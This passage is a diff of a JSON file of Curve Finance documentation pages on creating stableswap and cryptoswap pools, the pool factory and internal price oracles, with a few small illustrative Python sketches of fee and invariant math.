Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a Cryptoswap Pool Creating a Pool Tokens in Pool Pool Presets Parameters Creating a cryptoswap pool Creating a Cryptoswap Pool The v2 Curve Factory supports pools of assets with volatile prices, with no expectation of price stability. Understanding Curve v2 Creating a Pool The factory can be used to create a pool between any two or three ERC20 tokens. Based on trading activity in the pool, the v2 pools update an internal price oracle that the pool uses to rebalance itself. If the pool is using wrapped Ethereum as one of the two assets, the pool will also support depositing either raw ETH or wrapped Ethereum. Tokens in Pool The token selection tab can be used to select up to three tokens. The order of the tokens can matter for the performance of the AMM. Make sure to select the token with the higher price is first. If the tokens are supported by CoinGecko, you can see the \"Initial Price\" under the Pool Setup panel, choose the token order to maximize this value. On Ethereum at the top of the token selection popup you can see any Curve basepools suggested up top. These allow you to create a metapool , where the other asset can trade with any of the underlying basepool assets. You can search by name for any token already added to Curve, or paste a token address Pool Presets The \"Pool Presets\" tab provides scenarios that prepopulate appropriate parameters for users who are unfamiliar with advanced aspects of Curve pools. 
Some examples: Crypto: Used volatile pairings for tokens which are likely to deviate heavily in price Forex: Pairings that have low volatility Liquid Staking Derivatives: Similar to $cbETH and $rETH which handle Ethereum LSDs Tricrypto: Suitable for pools containing a USD stablecoin, BTC stablecoin and ETH. Three Coin Volatile: Suitable for pools containing a volatile token which is paired against ETH and USD stablecoins. Parameters On the parameters tab you can review and adjust the defaults populated by your selection on the \"pool presets\" tab. Crypto v2 pools contain a lot of parameters. If you are uncertain of which parameters to use, you may want to ask for help in any Curve channel before deploying. Some parameters can be tuned after the fact. The basic parameters include the fees charged to users who interact with the pool. This is divided dynamically into a \"Mid fee\" and \"Out fee\" parameter, which represent the minimum and maximum fee during periods of low and high volatility. Mid Fee: [.005% to 1%] Percentage. Fee when the pool is maximally balanced. This is the minimum fee. The fee is calculated as mid_fee * f + out_fee * (10^18 - f) Out Fee: [Mid Fee to 1%] Fee when the pool is imbalanced. Must be larger than the Mid Fee and represents the maximum fee. The initial prices fetch current prices from Coingecko to set the initial liquidity concentration. If your tokens do not exist on Coingecko you will need to populate these values manually, otherwise they will be filled automatically. The Advanced toggle allows you to adjust several of the other parameters under the hood. Amplification Parameter (A): [4,000 to 4,000,000,000] Larger values of A make the curve better resemble a straight line in the center (when pool is near balance). Highly volatile assets should use a lower value, while assets that are closer together may be best with a higher value. Gamma: [.00000001 to .02] The gamma parameter can further adjust the shape of the curve. Default values recommend .000145 for volatile assets and .0001 for less volatile assets. Allowed Extra Profit: [0 to .01] As the pool takes profit, the allowed extra profit parameter allows for greater values. Recommended 0.000002 for volatile assets and 0.00000001 for less volatile assets. Fee Gamma: [0 to 1] Adjusts how fast the fee increases from Mid Fee to Out Fee. Lower values cause fees to increase faster with imbalance. Recommended value of .0023 for volatile assets and .005 for less volatile assets. Adjustment Step: [0 to 1] As the pool rebalances, it will must do so in units larger than the adjustment step size. Volatile assets are suggested to use larger values (0.000146), while less volatile assets do not move as frequently and may use smaller step sizes (default 0.0000055) Moving Average Time: [0 to 604,800] In seconds -- the price oracle uses an exponential moving average to dampen the effect of changes. This parameter adjusts the half life used. A more thorough reader on the parameters can be found here . You can use this interactive tool to see how some of the parameters interact. After deployment, make sure to seed initial liquidity and create a gauge just like regular factory pools . 
Creating a Pool Gauge Last update: 2023-08-25 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Creating a cryptoswap pool Table of contents Creating a Pool Tokens in Pool Pool Presets Parameters Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Creating a Pool Tokens in Pool Pool Presets Parameters Home Factory Pools Creating a cryptoswap pool The v2 Curve Factory supports pools of assets with volatile prices, with no expectation of price stability. Understanding Curve v2 Creating a Pool The factory can be used to create a pool between any two or three ERC20 tokens. Based on trading activity in the pool, the v2 pools update an internal price oracle that the pool uses to rebalance itself. If the pool is using wrapped Ethereum as one of the two assets, the pool will also support depositing either raw ETH or wrapped Ethereum. Tokens in Pool The token selection tab can be used to select up to three tokens. The order of the tokens can matter for the performance of the AMM. Make sure the token with the higher price is selected first. If the tokens are supported by CoinGecko, you can see the \"Initial Price\" under the Pool Setup panel, choose the token order to maximize this value. On Ethereum, you can see any Curve basepools suggested at the top of the token selection popup. These allow you to create a metapool , where the other asset can trade with any of the underlying basepool assets. You can search by name for any token already added to Curve, or paste a token address. Pool Presets The \"Pool Presets\" tab provides scenarios that prepopulate appropriate parameters for users who are unfamiliar with advanced aspects of Curve pools. Some examples: Crypto: Used for volatile pairings of tokens which are likely to deviate heavily in price Forex: Pairings that have low volatility Liquid Staking Derivatives: Similar to $cbETH and $rETH which handle Ethereum LSDs Tricrypto: Suitable for pools containing a USD stablecoin, BTC stablecoin and ETH. Three Coin Volatile: Suitable for pools containing a volatile token which is paired against ETH and USD stablecoins.
Parameters On the parameters tab you can review and adjust the defaults populated by your selection on the \"pool presets\" tab. Crypto v2 pools contain a lot of parameters. If you are uncertain of which parameters to use, you may want to ask for help in any Curve channel before deploying. Some parameters can be tuned after the fact. The basic parameters include the fees charged to users who interact with the pool. This is divided dynamically into a \"Mid fee\" and \"Out fee\" parameter, which represent the minimum and maximum fee during periods of low and high volatility. Mid Fee: [.005% to 1%] Percentage. Fee when the pool is maximally balanced. This is the minimum fee. The fee is calculated as mid_fee * f + out_fee * (10^18 - f) Out Fee: [Mid Fee to 1%] Fee when the pool is imbalanced. Must be larger than the Mid Fee and represents the maximum fee. The initial prices fetch current prices from Coingecko to set the initial liquidity concentration. If your tokens do not exist on Coingecko you will need to populate these values manually, otherwise they will be filled automatically. The Advanced toggle allows you to adjust several of the other parameters under the hood. Amplification Parameter (A): [4,000 to 4,000,000,000] Larger values of A make the curve better resemble a straight line in the center (when pool is near balance). Highly volatile assets should use a lower value, while assets that are closer together may be best with a higher value. Gamma: [.00000001 to .02] The gamma parameter can further adjust the shape of the curve. Default values recommend .000145 for volatile assets and .0001 for less volatile assets. Allowed Extra Profit: [0 to .01] As the pool takes profit, the allowed extra profit parameter allows for greater values. Recommended 0.000002 for volatile assets and 0.00000001 for less volatile assets. Fee Gamma: [0 to 1] Adjusts how fast the fee increases from Mid Fee to Out Fee. Lower values cause fees to increase faster with imbalance. Recommended value of .0023 for volatile assets and .005 for less volatile assets. Adjustment Step: [0 to 1] As the pool rebalances, it must do so in units larger than the adjustment step size. Volatile assets are suggested to use larger values (0.000146), while less volatile assets do not move as frequently and may use smaller step sizes (default 0.0000055). Moving Average Time: [0 to 604,800] In seconds -- the price oracle uses an exponential moving average to dampen the effect of changes. This parameter adjusts the half-life used. A more thorough primer on the parameters can be found here . You can use this interactive tool to see how some of the parameters interact. After deployment, make sure to seed initial liquidity and create a gauge just like regular factory pools .
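As a rough illustration of the Mid Fee / Out Fee blend quoted above, here is a sketch that assumes f is a balance measure scaled to 1e18 (1e18 when the pool is perfectly balanced) and, as a readability assumption, normalizes the result back into fee units; the exact on-chain computation of f differs.

```python
def dynamic_fee(mid_fee: int, out_fee: int, f: int) -> int:
    # Quoted blend: mid_fee * f + out_fee * (1e18 - f), normalized by 1e18.
    # f = 1e18 -> fee == mid_fee (balanced pool);
    # f = 0    -> fee == out_fee (maximally imbalanced).
    assert 0 <= f <= 10**18
    return (mid_fee * f + out_fee * (10**18 - f)) // 10**18

# Assumed unit convention for the example: 10**18 == 100%.
MID, OUT = 5 * 10**14, 10**16            # 0.05% mid fee, 1% out fee
print(dynamic_fee(MID, OUT, 10**18))     # balanced pool: 0.05%
print(dynamic_fee(MID, OUT, 0))          # imbalanced pool: 1%
```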
Creating a Pool Gauge 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1946,15 +1946,15 @@ { "title": "Creating a stableswap pool", "html_url": "https://resources.curve.fi/factory-pools/creating-a-stableswap-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a stableswap pool Table of contents Creating a Stableswap Pool Token Selection Pool Presets Parameters Pool Info Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a Stableswap Pool Token Selection Pool Presets Parameters Pool Info Creating a stableswap pool Creating a Stableswap Pool The Stableswap pool creation is appropriate for assets expected to hold a price peg very close to each other, like a pair of dollarcoins. The creation wizard will guide you through the process of creating a pool, but if you have questions throughout you are encouraged to speak with a member of the Curve team in the Telegram or Discord . Token Selection The token selection tab can be used to select between two to four tokens. You can select a token by searching for the symbol of any token that is already being used on Curve, or by pasting the pools address. On Ethereum you might observe a handful of popular assets (ie Tether, USDC, Frax) are not available in the token selection dropdown. Some of these assets have been added to \"base pools,\" which can be used in the creation of other \"metapools.\" Base & MetaPools Base pools are suggested at the top of the token selection modal. As of April 2023, Curve supported two stablecoin basepools (3CRV/FraxBP) and a BTC basepool (sbTC2Crv). If you want to include a token that is part of a base pool, you must use it as part of a corresponding base pool. Base pools can only be paired with one other token. If you are using raw ether as a token, it must be added as \"Token A.\" WETH may be added as either Token A or Token B. If your pool contains rebasing tokens (a token that adjusts its total supply to control its price), make sure to select the appropriate box: The UI will not check to see if a pool containing your token pairs already exists. Some protocols have seen opportunities to create two pools containing the same assets but using different parameters (c/f stETH concentrated ). 
In most cases you should take care to make sure your pool does not already exist. Pool Presets The \"Pool Presets\" tab contains a few scenarios that prepopulate appropriate parameters for users unfamiliar with advanced aspects of Curve pools. The presets include an explanation of their use case. The Advanced options toggle includes a variety of options which may not apply to your case. Parameters The parameters tab allows you to adjust pool parameters. The pool's fee is applied to all transactions within the pool, half of which accrues to pool LPs, the other half is distributed to veCRV stakers. The fee for StableSwap pools may be set between .04% and 1%. The Advanced tab allows you to adjust the pool's \"A Parameter.\" The A Parameter is set by default based on your selection on the prior tab. A higher value for A concentrates liquidity better. If the assets are likely to fluctuate heavily you may want to lower the value below the default of 100. After the pool launches, the DAO has the capability of adjusting the A parameter. Understanding Curve Pools Pool Info Finally, you may adjust factors used for displaying the pool on the Curve site. These cannot be adjusted after launching so be careful when selecting these parameters. On the Curve UI the pools are grouped by the \"Asset Type Tag.\" This only affects its display on the Curve website, it has no effect on the pool's performance. USD: For pools only containing dollarcoins ETH: For pools only containing ETH BTC: For pools only containing BTC Other: All other assets Your pool is ready to launch! It will now appear on the Curve page, but it's not yet eligible to earn $CRV rewards. For next steps you will typically want to seed initial liquidity and create a pool gauge . Creating a Pool Gauge Last update: 2023-09-07 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a stableswap pool Table of contents Token Selection Pool Presets Parameters Pool Info Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Token Selection Pool Presets Parameters Pool Info Home Factory Pools Creating a stableswap pool The Stableswap pool creation is appropriate for assets expected to hold a price peg very close
to each other, like a pair of dollarcoins. The creation wizard will guide you through the process of creating a pool, but if you have questions throughout you are encouraged to speak with a member of the Curve team in the Telegram or Discord . Token Selection The token selection tab can be used to select between two and four tokens. You can select a token by searching for the symbol of any token that is already being used on Curve, or by pasting the token's address. On Ethereum you might observe a handful of popular assets (i.e. Tether, USDC, Frax) are not available in the token selection dropdown. Some of these assets have been added to \"base pools,\" which can be used in the creation of other \"metapools.\" Base & MetaPools Base pools are suggested at the top of the token selection modal. As of April 2023, Curve supported two stablecoin basepools (3CRV/FraxBP) and a BTC basepool (sbTC2Crv). If you want to include a token that is part of a base pool, you must use it as part of a corresponding base pool. Base pools can only be paired with one other token. If you are using raw ether as a token, it must be added as \"Token A.\" WETH may be added as either Token A or Token B. If your pool contains rebasing tokens (a token that adjusts its total supply to control its price), make sure to select the appropriate box: The UI will not check to see if a pool containing your token pairs already exists. Some protocols have seen opportunities to create two pools containing the same assets but using different parameters (cf. stETH concentrated ). In most cases you should take care to make sure your pool does not already exist. Pool Presets The \"Pool Presets\" tab contains a few scenarios that prepopulate appropriate parameters for users unfamiliar with advanced aspects of Curve pools. The presets include an explanation of their use case. The Advanced options toggle includes a variety of options which may not apply to your case. Parameters The parameters tab allows you to adjust pool parameters. The pool's fee is applied to all transactions within the pool, half of which accrues to pool LPs, while the other half is distributed to veCRV stakers. The fee for StableSwap pools may be set between .04% and 1%. The Advanced tab allows you to adjust the pool's \"A Parameter.\" The A Parameter is set by default based on your selection on the prior tab. A higher value for A concentrates liquidity better. If the assets are likely to fluctuate heavily you may want to lower the value below the default of 100. After the pool launches, the DAO has the capability of adjusting the A parameter. Understanding Curve Pools Pool Info Finally, you may adjust factors used for displaying the pool on the Curve site. These cannot be adjusted after launching, so be careful when selecting these parameters. On the Curve UI the pools are grouped by the \"Asset Type Tag.\" This only affects its display on the Curve website; it has no effect on the pool's performance. USD: For pools only containing dollarcoins ETH: For pools only containing ETH BTC: For pools only containing BTC Other: All other assets Your pool is ready to launch! It will now appear on the Curve page, but it's not yet eligible to earn $CRV rewards. For next steps you will typically want to seed initial liquidity and create a pool gauge .
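For intuition about the A Parameter discussed above, the following sketch computes the StableSwap invariant D using the common iterative form from the StableSwap paper; it is an illustration in float math, not the factory contract code.

```python
def stableswap_D(balances, A, tol=1e-9):
    # Iterative solution for the StableSwap invariant D. Larger A flattens
    # the curve near balance, concentrating liquidity around the peg.
    n = len(balances)
    S = sum(balances)
    if S == 0:
        return 0.0
    D, Ann = float(S), A * n
    for _ in range(255):
        D_P = D
        for x in balances:
            D_P = D_P * D / (n * x)
        D_prev = D
        D = (Ann * S + D_P * n) * D / ((Ann - 1) * D + (n + 1) * D_P)
        if abs(D - D_prev) <= tol:
            break
    return D

# Same imbalanced balances, different A: higher A keeps D closer to the
# plain sum, i.e. liquidity stays concentrated around the peg.
print(stableswap_D([1500.0, 500.0], A=10))
print(stableswap_D([1500.0, 500.0], A=100))
```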
Creating a Pool Gauge 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Pool factory", + "title": "Understanding pool factory", "html_url": "https://resources.curve.fi/factory-pools/pool-factory/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Pool factory Table of contents Understanding Factory Pools Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Factory Pools Pool factory Understanding Factory Pools The Curve pool creation factory allows any user to permissionlessly deploy a Curve pool. These pools can contain a variety of assets, including pegged tokens, unpegged tokens, and metapools built off of other base pools . Base & MetaPools Keep in mind a few points about all pools: Destroying Curve pools once deployed is not possible Curve is not responsible for any of the assets going in there so you must do your own research when trading in the pool factory. The Curve team and DAO also have no control over the tokens added in the factory which means you must verify the token addresses you trade on there. The only admin change that can be made by the Curve DAO is ramping the A (amplification) parameter Tokens with more than 18 decimals are not supported After deploying a pool, you must seed initial liquidity if you want users to interact with it. Pools will only display on the homepage by default if their TVL is not below the threshold of what is considered \"small.\" https://curve.fi/#/ethereum/create-pool To get started, visit the \" Pool Creation \" tab at the top of the Curve homepage, and select whether you would like to create a \"Stableswap Pool\" (a pool with pegged assets) or a \"Cryptoswap Pool\" (containing assets whose prices may be volatile). Creating a Stableswap Pool Creating a Cryptoswap Pool Note some sidechains may not yet support a stableswap or cryptoswap pool factory. 
Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Home Factory Pools Understanding pool factory The Curve pool creation factory allows any user to permissionlessly deploy a Curve pool. These pools can contain a variety of assets, including pegged tokens, unpegged tokens, and metapools built off of other base pools . Base & MetaPools Keep in mind a few points about all pools: Destroying Curve pools once deployed is not possible Curve is not responsible for any of the assets added to factory pools, so you must do your own research before trading them. The Curve team and DAO also have no control over the tokens added in the factory, which means you must verify the token addresses you trade there. The only admin change that can be made by the Curve DAO is ramping the A (amplification) parameter Tokens with more than 18 decimals are not supported After deploying a pool, you must seed initial liquidity if you want users to interact with it. Pools only display on the homepage by default if their TVL is above the threshold of what is considered \"small.\" https://curve.fi/#/ethereum/create-pool To get started, visit the \" Pool Creation \" tab at the top of the Curve homepage, and select whether you would like to create a \"Stableswap Pool\" (a pool with pegged assets) or a \"Cryptoswap Pool\" (containing assets whose prices may be volatile). Creating a Stableswap Pool Creating a Cryptoswap Pool Note some sidechains may not yet support a stableswap or cryptoswap pool factory.
2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1962,7 +1962,7 @@ { "title": "Understanding oracles", "html_url": "https://resources.curve.fi/factory-pools/understanding-oracles/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Understanding oracles Table of contents Understanding Oracles Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Oracles Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Understanding oracles Understanding Oracles This article primarily covers the role of internal price oracles within Curve Finance v2 pools, with a brief note at the end of LLAMMA price oracles . Please note that Curve v1 and v2 pools do not rely on external price oracles. Misuse of external price oracles is a contributing factor to several major DeFi hacks. If you are looking to use Curves price oracle functions, or any price oracle, to provide on-chain pricing data in a decentralized application you are building, we recommend extreme caution. Purpose Curve v2 pools , which consist of assets with volatile prices, require a means of tracking prices. Instead of relying on external oracles, the pool instead calculates the price of these assets internally based on the trading activity within the pool. This is tracked by two similar but distinct parameters: Price Oracle: The pools expectation of the assets price Price Scale: The price based on the pools actual concentration of liquidity Pools keep track of recent trades within the pool as a variable called last_prices . The price_oracle is calculated as an exponential moving average of recent trade prices. The price_oracle represents what the pool believes is the fair price of the asset . In contrast, price_scale is a snapshot of how the liquidity in the pool is actually distributed. For this reason, price_scale lags price_oracle . As users make trades, the pool calculates how to profitably readjust liquidity , and the price_scale moves in the direction of the price_oracle . 
Price Oracle and Price Scale shown in the Curve UI Exponential Moving Average As discussed above , the price_oracle variable is calculated as an exponential moving average of last_prices . For comparison, traders commonly rely on a simple moving average as a technical analysis indicator, which calculates the average of a certain number points (ie, a 200-day moving average computes the average of the trailing 200 days of data). The exponential moving average\" is similar, except it applies a weighting to emphasize newer data over older data. This weighting falls off exponentially as it looks further back in time, so it can react quicker to recent trends. Updates An internal function tweak_price is called every time prices might need to be updated by an operation which might adjust balances within a pool (hereafter referred to as a liquidity operation ): add_liquidity remove_liquidity_one_coin exchange exchange_underlying The tweak_price function is a gas expensive function which can execute several state changing operations to state variables_._ Price Oracle The price_oracle is updated only once per block. If the current timestamp is greater than the timestamp of the last update, then price_oracle is updated using the previous price_oracle value and data from last_prices . The updated price_oracle is then used to calculate the vector distance from the price_scale , which is used to determine the amount of adjustment required for the price_scale . Profits and Liquidity Balances Curve v2 pools operate on profits. That is, liquidity is rebalanced when the pool has earned sufficient profits to do so. Every time a liquidity operation occurs, the pool chooses whether it should spend profits on rebalancing. The pools actions may be considered as an attempt to rebalance liquidity close to market prices. Pools perform all such operations strictly with profits, never with user funds. Profits are occasionally claimed by administrators, otherwise funds remain in the pool. In other words, profits can be calculated from the following function: profits == erc20.balanceOf(i) - pool.balances(i) Internally, every time the tweak_price function is called during a liquidity operation , the pool tracks profits. It then uses the updated profit values to consider if it should rebalance liquidity. Specifically, pools carry a public parameter called allowed_extra_profit which works like a buffer. If the pools virtual price has grown by more than a function of profits and the allowed_extra_profit buffer value, then the pool is considered profitable enough to rebalance liquidity. From here, the pool further checks that the price_scale is sufficiently different from price_oracle , to avoid rebalancing liquidity when prices are pegged. Finally, the pool computes the updates to the price_scale and how this affects other pool parameters. If profits still allow, then the liquidity is rebalanced and prices are adjusted. Manipulation We do not recommend using Curve pools by themselves as canonical price oracles. It is possible, particularly with low liquidity pools, for outside users to manipulate the price. Curve pools nonetheless include protections against some forms of manipulation. The logic of the Curve price_oracle variable only updates once per block, which makes it more resistant to manipulation from malicious trading activity within a single block. 
Due to the fact that changes to price_oracle are dampened by an exponential moving average , attempts to manipulate the price may succeed but would require a prolonged attack over several blocks. Actual $CVX price versus CVX-ETH Pool Price Oracle and Price Scale during rapid volatility These safeguards all help to prevent various forms of manipulation. However, for pools with low liquidity, it is not difficult for whales to manipulate the price over the course of several transactions. When relying on oracles on-chain, it is safest to compare results among several oracles and revert if any is behaving unusually. v1 Pools Newer v1 Pools also contain a price oracle function, which also displays a moving average of recent prices. If the moving average price was written to the contract in the same block it will return this value, otherwise it will calculate on the fly any changes to the moving average since it was last written. Curve v1 pools do not have a concept of price scale, so no endpoint exists for retreiving this value. Older v1 pools will also not have a price oracle, so use caution if you are attempting to retrieve this value on-chain. LLAMMA The LLAMMA use of oracles is quite different than Curve v2 pools in that it can utilize external price oracles. In LLAMMA, the price_oracle function refers to the collateral price (which can be thought of as the current market price) as determined by an external contract. For example, LLAMMA uses price_oracle to convert $ETH to $crvUSD at a specific collateral price. When the external price is higher than the upper price (internally: P_UP ), all assets in the band range are converted to $ETH. When the price is lower than the lower price (internally: P_DOWN ), all assets are converted to $crvUSD. When the oracle price is in the middle, the current band is partially converted, with the exact proportion determined by price changes. When the external price changes, an arbitrage opportunity exists. External arbitrageurs can deposit $ETH or $crvUSD to balance the pool, until the pool price reaches parity with the external price. LLAMMA applies an exponential moving average to the price_oracle to prevent users from absorbing losses due to drastic fluctuations. More information on price oracles and other LLAMMA dynamics are available at this article . 
Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Understanding oracles Table of contents Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Home Factory Pools Understanding oracles This article primarily covers the role of internal price oracles within Curve Finance v2 pools, with a brief note at the end on LLAMMA price oracles . Please note that Curve v1 and v2 pools do not rely on external price oracles. Misuse of external price oracles is a contributing factor to several major DeFi hacks. If you are looking to use Curve's price oracle functions, or any price oracle, to provide on-chain pricing data in a decentralized application you are building, we recommend extreme caution. Purpose Curve v2 pools , which consist of assets with volatile prices, require a means of tracking prices. Instead of relying on external oracles, the pool calculates the price of these assets internally based on the trading activity within the pool. This is tracked by two similar but distinct parameters: Price Oracle: The pool's expectation of the asset's price Price Scale: The price based on the pool's actual concentration of liquidity Pools keep track of recent trades within the pool as a variable called last_prices . The price_oracle is calculated as an exponential moving average of recent trade prices. The price_oracle represents what the pool believes is the fair price of the asset . In contrast, price_scale is a snapshot of how the liquidity in the pool is actually distributed. For this reason, price_scale lags price_oracle . As users make trades, the pool calculates how to profitably readjust liquidity , and the price_scale moves in the direction of the price_oracle . Price Oracle and Price Scale shown in the Curve UI Exponential Moving Average As discussed above , the price_oracle variable is calculated as an exponential moving average of last_prices .
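As a sketch of the exponential-moving-average behavior described in this section, assuming a half-life parameterization (the names and the single-step form are illustrative, not the contract's internals):

```python
import math

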